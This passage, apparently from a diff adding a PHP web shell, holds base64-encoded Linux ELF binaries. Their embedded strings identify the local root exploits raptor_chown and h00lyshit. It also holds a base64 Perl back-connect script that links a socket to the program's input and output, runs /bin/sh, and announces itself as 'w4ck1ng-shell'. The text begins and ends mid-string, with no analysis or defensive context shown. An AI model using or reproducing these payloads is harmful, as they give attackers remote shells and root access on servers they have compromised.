+AAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEECEgB +AABIAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAJCBBAiQAQAA0AAAAAUAAAABAAAABAAA +ABAAAAA/AAAAAwAAAAIAAABgggQIYAIAAJcAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28CAAAA ++IIECPgCAAAaAAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAABSDBAgUAwAAMAAAAAUAAAAB +AAAABAAAAAAAAABjAAAACQAAAAIAAABEgwQIRAMAABAAAAAEAAAAAAAAAAQAAAAIAAAAbAAAAAkA +AAACAAAAVIMECFQDAABIAAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAJyDBAicAwAAFwAA +AAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAC0gwQItAMAAKAAAAAAAAAAAAAAAAQAAAAEAAAA +ewAAAAEAAAAGAAAAVIQECFQEAAB0AgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiGBAjI +BgAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAAAAhwQIAAcAAAABAAAAAAAAAAAAACAA +AAAAAAAAjwAAAAEAAAADAAAAAJgECAAIAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAAAgAA +AAyYBAgMCAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQmAQIEAgAAMgAAAAFAAAA +AAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JgECNgIAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8AAAAB +AAAAAwAAAOCYBAjgCAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADomAQI6AgAAAQA +AAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JgECOwIAAA0AAAAAAAAAAAAAAAEAAAABAAA +AMAAAAAIAAAAAwAAACCZBAggCQAACAAAAAAAAAAAAAAABAAAAAAAAADFAAAAAQAAAAAAAAAAAAAA +IAkAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAMgJAADOAAAAAAAAAAAAAAAB +AAAAAAAAAAEAAAACAAAAAAAAAAAAAADQDgAA0AQAABoAAAArAAAABAAAABAAAAAJAAAAAwAAAAAA +AAAAAAAAoBMAANcCAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUgQQIAAAA +AAMAAQAAAAAAKIEECAAAAAADAAIAAAAAAEiBBAgAAAAAAwADAAAAAACQgQQIAAAAAAMABAAAAAAA +YIIECAAAAAADAAUAAAAAAPiCBAgAAAAAAwAGAAAAAAAUgwQIAAAAAAMABwAAAAAARIMECAAAAAAD +AAgAAAAAAFSDBAgAAAAAAwAJAAAAAACcgwQIAAAAAAMACgAAAAAAtIMECAAAAAADAAsAAAAAAFSE +BAgAAAAAAwAMAAAAAADIhgQIAAAAAAMADQAAAAAAAIcECAAAAAADAA4AAAAAAACYBAgAAAAAAwAP +AAAAAAAMmAQIAAAAAAMAEAAAAAAAEJgECAAAAAADABEAAAAAANiYBAgAAAAAAwASAAAAAADgmAQI +AAAAAAMAEwAAAAAA6JgECAAAAAADABQAAAAAAOyYBAgAAAAAAwAVAAAAAAAgmQQIAAAAAAMAFgAA +AAAAAAAAAAAAAAADABcAAAAAAAAAAAAAAAAAAwAYAAAAAAAAAAAAAAAAAAMAGQAAAAAAAAAAAAAA +AAADABoAAQAAAHiEBAgAAAAAAgAMABEAAAAAAAAAAAAAAAQA8f8cAAAA2JgECAAAAAABABIAKgAA +AOCYBAgAAAAAAQATADgAAADomAQIAAAAAAEAFABFAAAACJgECAAAAAABAA8ASQAAACSZBAgBAAAA +AQAWAFUAAACchAQIAAAAAAIADABrAAAA2IQECAAAAAACAAwAEQAAAAAAAAAAAAAABADx/3cAAADc +mAQIAAAAAAEAEgCEAAAA5JgECAAAAAABABMAkQAAAAyYBAgAAAAAAQAQAJ8AAADomAQIAAAAAAEA +FACrAAAApIYECAAAAAACAAwAwQAAAAAAAAAAAAAABADx/9AAAAAAAAAA4AAAABIAAADhAAAAEJgE +CAAAAAARABEA6gAAAACHBAgEAAAAEQAOAPEAAAAAAAAAyQEAABIAAAADAQAAAAAAABQAAAASAAAA +FgEAAACYBAgAAAAAEALx/ycBAAAEmAQIAAAAABECDwA0AQAAYIYECEQAAAASAAwARAEAAAAAAAA0 +AAAAEgAAAGABAAAAAAAAZgAAABIAAAByAQAAnIMECAAAAAASAAoAeAEAACCZBAgEAAAAEQAWAIoB +AABUhAQIAAAAABIADACRAQAAAJgECAAAAAAQAvH/pAEAABiGBAhIAAAAEgAMALQBAAAgmQQIAAAA +ABAA8f/AAQAABIUECBEBAAASAAwAxQEAAAAAAADVAAAAEgAAAOIBAAAAmAQIAAAAABAC8f/zAQAA +AJgECAAAAAAgAA8A/gEAAMiGBAgAAAAAEgANAAQCAAAAAAAAQwAAABIAAAAWAgAAAJgECAAAAAAQ +AvH/KgIAAAAAAADLAAAAEgAAADoCAAAgmQQIAAAAABAA8f9BAgAA7JgECAAAAAARABUAVwIAACiZ +BAgAAAAAEADx/1wCAAAAmAQIAAAAABAC8f9vAgAABIcECAQAAAARAA4AfgIAAAAAAAAkAAAAEgAA +AJECAAAAmAQIAAAAABAADwCeAgAAAAAAAAAAAAAgAAAAsgIAAACYBAgAAAAAEALx/8gCAAAAAAAA +AAAAACAAAAAAY2FsbF9nbW9uX3N0YXJ0AGNydHN0dWZmLmMAX19DVE9SX0xJU1RfXwBfX0RUT1Jf +TElTVF9fAF9fSkNSX0xJU1RfXwBwLjAAY29tcGxldGVkLjEAX19kb19nbG9iYWxfZHRvcnNfYXV4 +AGZyYW1lX2R1bW15AF9fQ1RPUl9FTkRfXwBfX0RUT1JfRU5EX18AX19GUkFNRV9FTkRfXwBfX0pD +Ul9FTkRfXwBfX2RvX2dsb2JhbF9jdG9yc19hdXgAcmFwdG9yX2Nob3duLmMAY2hvd25AQEdMSUJD +XzIuMQBfRFlOQU1JQwBfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZnByaW50ZkBAR0xJQkNfMi4w +AF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAF9fbGliY19jc3VfZmluaQBfX2Vycm5vX2xv +Y2F0aW9uQEBHTElCQ18yLjAAc3lzdGVtQEBHTElCQ18yLjAAX2luaXQAc3RkZXJyQEBHTElCQ18y +LjAAX3N0YXJ0AF9fZmluaV9hcnJheV9zdGFydABfX2xpYmNfY3N1X2luaXQAX19ic3Nfc3RhcnQA +bWFpbgBfX2xpYmNfc3RhcnRfbWFpbkBAR0xJQkNfMi4wAF9faW5pdF9hcnJheV9lbmQAZGF0YV9z +dGFydABfZmluaQBnZXRnaWRAQEdMSUJDXzIuMABfX3ByZWluaXRfYXJyYXlfZW5kAGV4aXRAQEdM +SUJDXzIuMABfZWRhdGEAX0dMT0JBTF9PRkZTRVRfVEFCTEVfAF9lbmQAX19pbml0X2FycmF5X3N0 +YXJ0AF9JT19zdGRpbl91c2VkAHNwcmludGZAQEdMSUJDXzIuMABfX2RhdGFfc3RhcnQAX0p2X1Jl +Z2lzdGVyQ2xhc3NlcwBfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A"; + +$h00lyshit="f0VMRgEBAQAAAAAAAAAAAAIAAwABAAAAgIcECDQAAADYEgAAAAAAADQAIAAHACgAGwAYAAYAAAA0 +AAAANIAECDSABAjgAAAA4AAAAAUAAAAEAAAAAwAAABQBAAAUgQQIFIEECBMAAAATAAAABAAAAAEA +AAABAAAAAAAAAACABAgAgAQIbg4AAG4OAAAFAAAAABAAAAEAAAAAEAAAAJAECACQBAhYAQAAxAgA +AAYAAAAAEAAAAgAAABAQAAAQkAQIEJAECMgAAADIAAAABgAAAAQAAAAEAAAAKAEAACiBBAgogQQI +IAAAACAAAAAEAAAABAAAAFHldGQAAAAAAAAAAAAAAAAAAAAAAAAAAAYAAAAEAAAAL2xpYi9sZC1s +aW51eC5zby4yAAAEAAAAEAAAAAEAAABHTlUAAAAAAAIAAAACAAAABQAAABEAAAAdAAAADgAAAAAA +AAAaAAAAAAAAAAkAAAARAAAAAQAAABAAAAATAAAAAwAAABsAAAALAAAAAAAAABkAAAAPAAAAHAAA +AAIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAA +AAAAAAcAAAAAAAAAAAAAAAAAAAAKAAAACAAAAAwAAAASAAAADQAAABYAAAAXAAAAGAAAABQAAAAV +AAAABgAAAAAAAAAAAAAAAAAAAAAAAAAhAAAAAAAAAAgAAAASAAAAYgAAAAAAAABGAAAAEgAAADUA +AAAAAAAAyQEAABIAAABdAAAAAAAAAFAAAAASAAAAPAAAAAAAAAC+AAAAEgAAAEMAAAAAAAAANgAA +ABIAAAAaAAAAAAAAAFcAAAASAAAASAAAAAAAAAA6AAAAEgAAACgAAAAAAAAASAAAABIAAAC2AAAA +AAAAAC4AAAASAAAAEwAAAGCRBAgEAAAAEQAWAIQAAABkkQQIBAAAABEAFgALAAAAAAAAAHwAAAAS +AAAAwgAAAAAAAAAhAQAAEgAAAHAAAAAAAAAAeQAAABIAAACfAAAAAAAAANUAAAASAAAATgAAAAAA +AAAnAAAAEgAAAH0AAAAAAAAAKQAAABIAAAAuAAAAAAAAADcAAAASAAAANgAAAHuIBAgvAAAAEgAM +ALEAAAAAAAAAfAAAABIAAACLAAAAAAAAAMsAAAASAAAAdQAAAAAAAADJAAAAEgAAAGkAAAAAAAAA +QwAAABIAAACQAAAA6I0ECAQAAAARAA4AVQAAAAAAAAA8AAAAEgAAAHwAAAAAAAAAJAAAABIAAADL +AAAAAAAAAAAAAAAgAAAAAGxpYmMuc28uNgB3YWl0cGlkAHN0ZG91dABleGVjdmUAZ2V0cGlkAHBy +Y3RsAG1lbWNweQBwZXJyb3IAZmZsdXNoAG1tYXAAY2htb2QAc3RyY2F0AG1hZHZpc2UAZm9yawBz +dHJkdXAAbWVtc2V0AG5pY2UAZ2V0Y3dkAHNwcmludGYAc3RkZXJyAGV4aXQAX0lPX3N0ZGluX3Vz +ZWQAX19saWJjX3N0YXJ0X21haW4Ab3BlbgBzY2hlZF95aWVsZABfX2Z4c3RhdABfX2dtb25fc3Rh +cnRfXwBHTElCQ18yLjAAAAACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAEA +AgACAAIAAgABAAIAAgAAAAAAAQABAAEAAAAQAAAAAAAAABBpaQ0AAAIA2gAAAAAAAABUkQQIBhwA +AGCRBAgFCwAAZJEECAUMAAD4kAQIBwEAAPyQBAgHAgAAAJEECAcDAAAEkQQIBwQAAAiRBAgHBQAA +DJEECAcGAAAQkQQIBwcAABSRBAgHCAAAGJEECAcJAAAckQQIBwoAACCRBAgHDQAAJJEECAcOAAAo +kQQIBw8AACyRBAgHEAAAMJEECAcRAAA0kQQIBxIAADiRBAgHEwAAPJEECAcVAABAkQQIBxYAAESR +BAgHFwAASJEECAcYAABMkQQIBxoAAFCRBAgHGwAAVYnlg+wI6LEBAADoDAIAAOinBwAAycMA/zXw +kAQI/yX0kAQIAAAAAP8l+JAECGgAAAAA6eD/////JfyQBAhoCAAAAOnQ/////yUAkQQIaBAAAADp +wP////8lBJEECGgYAAAA6bD/////JQiRBAhoIAAAAOmg/////yUMkQQIaCgAAADpkP////8lEJEE +CGgwAAAA6YD/////JRSRBAhoOAAAAOlw/////yUYkQQIaEAAAADpYP////8lHJEECGhIAAAA6VD/ +////JSCRBAhoUAAAAOlA/////yUkkQQIaFgAAADpMP////8lKJEECGhgAAAA6SD/////JSyRBAho +aAAAAOkQ/////yUwkQQIaHAAAADpAP////8lNJEECGh4AAAA6fD+////JTiRBAhogAAAAOng/v// +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 +ZTogYmluYXJ5IDxiaWcgZmlsZSBuYW1lPgAKcHJlcGFyaW5nAC8AZXhlY3ZlwAAADohQQIDQAAAMiNBAgEAAAASIEECAUAAADYgwQIBgAAAAiCBAgK +AAAA5AAAAAsAAAAQAAAAFQAAAAAAAAADAAAA7JAECAIAAAC4AAAAFAAAABEAAAAXAAAAMIUECBEA +AAAYhQQIEgAAABgAAAATAAAACAAAAP7//2/4hAQI////bwEAAADw//9vvIQECAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP////8AAAAA/////wAAAAAAAAAA +EJAECAAAAAAAAAAAFoYECCaGBAg2hgQIRoYECFaGBAhmhgQIdoYECIaGBAiWhgQIpoYECLaGBAjG +hgQI1oYECOaGBAj2hgQIBocECBaHBAgmhwQINocECEaHBAhWhwQIZocECHaHBAgAAAAAAAAAAAAA +AAAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkAAEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2Up +AABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAAR0NDOiAoR05VKSAzLjMuMyAocmVsZWFzZSkA +AEdDQzogKEdOVSkgMy4zLjMgKHJlbGVhc2UpAABHQ0M6IChHTlUpIDMuMy4zIChyZWxlYXNlKQAA +LnN5bXRhYgAuc3RydGFiAC5zaHN0cnRhYgAuaW50ZXJwAC5ub3RlLkFCSS10YWcALmhhc2gALmR5 +bnN5bQAuZHluc3RyAC5nbnUudmVyc2lvbgAuZ251LnZlcnNpb25fcgAucmVsLmR5bgAucmVsLnBs +dAAuaW5pdAAudGV4dAAuZmluaQAucm9kYXRhAC5kYXRhAC5laF9mcmFtZQAuZHluYW1pYwAuY3Rv +cnMALmR0b3JzAC5qY3IALmdvdAAuYnNzAC5jb21tZW50AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAABsAAAABAAAAAgAAABSBBAgUAQAAEwAAAAAAAAAAAAAAAQAAAAAA +AAAjAAAABwAAAAIAAAAogQQIKAEAACAAAAAAAAAAAAAAAAQAAAAAAAAAMQAAAAUAAAACAAAASIEE +CEgBAADAAAAABAAAAAAAAAAEAAAABAAAADcAAAALAAAAAgAAAAiCBAgIAgAA0AEAAAUAAAABAAAA +BAAAABAAAAA/AAAAAwAAAAIAAADYgwQI2AMAAOQAAAAAAAAAAAAAAAEAAAAAAAAARwAAAP///28C +AAAAvIQECLwEAAA6AAAABAAAAAAAAAACAAAAAgAAAFQAAAD+//9vAgAAAPiEBAj4BAAAIAAAAAUA +AAABAAAABAAAAAAAAABjAAAACQAAAAIAAAAYhQQIGAUAABgAAAAEAAAAAAAAAAQAAAAIAAAAbAAA +AAkAAAACAAAAMIUECDAFAAC4AAAABAAAAAsAAAAEAAAACAAAAHUAAAABAAAABgAAAOiFBAjoBQAA +FwAAAAAAAAAAAAAABAAAAAAAAABwAAAAAQAAAAYAAAAAhgQIAAYAAIABAAAAAAAAAAAAAAQAAAAE +AAAAewAAAAEAAAAGAAAAgIcECIAHAABIBgAAAAAAAAAAAAAEAAAAAAAAAIEAAAABAAAABgAAAMiN +BAjIDQAAGwAAAAAAAAAAAAAABAAAAAAAAACHAAAAAQAAAAIAAADkjQQI5A0AAIoAAAAAAAAAAAAA +AAQAAAAAAAAAjwAAAAEAAAADAAAAAJAECAAQAAAMAAAAAAAAAAAAAAAEAAAAAAAAAJUAAAABAAAA +AgAAAAyQBAgMEAAABAAAAAAAAAAAAAAABAAAAAAAAACfAAAABgAAAAMAAAAQkAQIEBAAAMgAAAAF +AAAAAAAAAAQAAAAIAAAAqAAAAAEAAAADAAAA2JAECNgQAAAIAAAAAAAAAAAAAAAEAAAAAAAAAK8A +AAABAAAAAwAAAOCQBAjgEAAACAAAAAAAAAAAAAAABAAAAAAAAAC2AAAAAQAAAAMAAADokAQI6BAA +AAQAAAAAAAAAAAAAAAQAAAAAAAAAuwAAAAEAAAADAAAA7JAECOwQAABsAAAAAAAAAAAAAAAEAAAA +BAAAAMAAAAAIAAAAAwAAAGCRBAhgEQAAZAcAAAAAAAAAAAAAIAAAAAAAAADFAAAAAQAAAAAAAAAA +AAAAYBEAAKgAAAAAAAAAAAAAAAEAAAAAAAAAEQAAAAMAAAAAAAAAAAAAAAgSAADOAAAAAAAAAAAA +AAABAAAAAAAAAAEAAAACAAAAAAAAAAAAAAAQFwAAoAYAABoAAAAzAAAABAAAABAAAAAJAAAAAwAA +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 +bF9kdG9yc19hdXgAZnJhbWVfZHVtbXkAX19DVE9SX0VORF9fAF9fRFRPUl9FTkRfXwBfX0ZSQU1F +X0VORF9fAF9fSkNSX0VORF9fAF9fZG9fZ2xvYmFsX2N0b3JzX2F1eABoMDBseXNoaXQuYwBjbWQA +YXJnAGMAdABlAGEAZXgAYgBnZXRwaWRAQEdMSUJDXzIuMABfRFlOQU1JQwBzdHJkdXBAQEdMSUJD +XzIuMABfZnBfaHcAcGVycm9yQEBHTElCQ18yLjAAZm9ya0BAR0xJQkNfMi4wAGZmbHVzaEBAR0xJ +QkNfMi4wAF9fZmluaV9hcnJheV9lbmQAX19kc29faGFuZGxlAG1tYXBAQEdMSUJDXzIuMABfX2xp +YmNfY3N1X2ZpbmkAZXhlY3ZlQEBHTElCQ18yLjAAY2htb2RAQEdMSUJDXzIuMABfaW5pdABwcmN0 +bEBAR0xJQkNfMi4wAHNjaGVkX3lpZWxkQEBHTElCQ18yLjAAZnN0YXQAc3Rkb3V0QEBHTElCQ18y +LjAAc3RkZXJyQEBHTElCQ18yLjAAd2FpdHBpZEBAR0xJQkNfMi4wAF9zdGFydABfX2Z4c3RhdEBA +R0xJQkNfMi4wAG5pY2VAQEdMSUJDXzIuMABfX2ZpbmlfYXJyYXlfc3RhcnQAX19saWJjX2NzdV9p +bml0AF9fYnNzX3N0YXJ0AG1haW4AX19saWJjX3N0YXJ0X21haW5AQEdMSUJDXzIuMABfX2luaXRf +YXJyYXlfZW5kAHN0cmNhdEBAR0xJQkNfMi4wAGRhdGFfc3RhcnQAcHJpbnRmQEBHTElCQ18yLjAA +X2ZpbmkAbWVtY3B5QEBHTElCQ18yLjAAZXJyb3IAX19wcmVpbml0X2FycmF5X2VuZABfX2V4Y29k +ZQBvcGVuQEBHTElCQ18yLjAAZXhpdEBAR0xJQkNfMi4wAF9lZGF0YQBfR0xPQkFMX09GRlNFVF9U +QUJMRV8AX2VuZABnZXRjd2RAQEdMSUJDXzIuMABtZW1zZXRAQEdMSUJDXzIuMABfX2V4Y29kZV9l +AF9faW5pdF9hcnJheV9zdGFydABfX2ZzdGF0AF9JT19zdGRpbl91c2VkAG1hZHZpc2VAQEdMSUJD +XzIuMABzcHJpbnRmQEBHTElCQ18yLjAAX19kYXRhX3N0YXJ0AF9Kdl9SZWdpc3RlckNsYXNzZXMA +ZXhwbG9pdABfX3ByZWluaXRfYXJyYXlfc3RhcnQAX19nbW9uX3N0YXJ0X18A"; + + +$back_connect_c=""; + +$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiOyc7DQokc3lzdGVtMT0gJ2VjaG8gImBpZGAiOyc7DQokc3lzdGVtMj0gJ2VjaG8gImBwd2RgIjsnOw0KJHN5c3RlbTM9ICdlY2hvICJgd2hvYW1pYEBgaG9zdG5hbWVgOn4gPiI7JzsNCiRzeXN0ZW00PSAnL2Jpbi9zaCc7DQokMD0kY21kOw0KJHRhcmdldD0kQVJHVlswXTsNCiRwb3J0PSRBUkdWWzFdOw0KJGlhZGRyPWluZXRfYXRvbigkdGFyZ2V0KSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHByb3RvPWdldHByb3RvYnluYW1lKCd0Y3AnKTsNCnNvY2tldChTT0NLRVQsIFBGX0lORVQsIFNPQ0tfU1RSRUFNLCAkcHJvdG8pIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCm9wZW4oU1RESU4sICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERPVVQsICI+JlNPQ0tFVCIpOw0Kb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOw0KcHJpbnQgIlxuXG46OiB3NGNrMW5nLXNoZWxsIChQcml2YXRlIEJ1aWxkI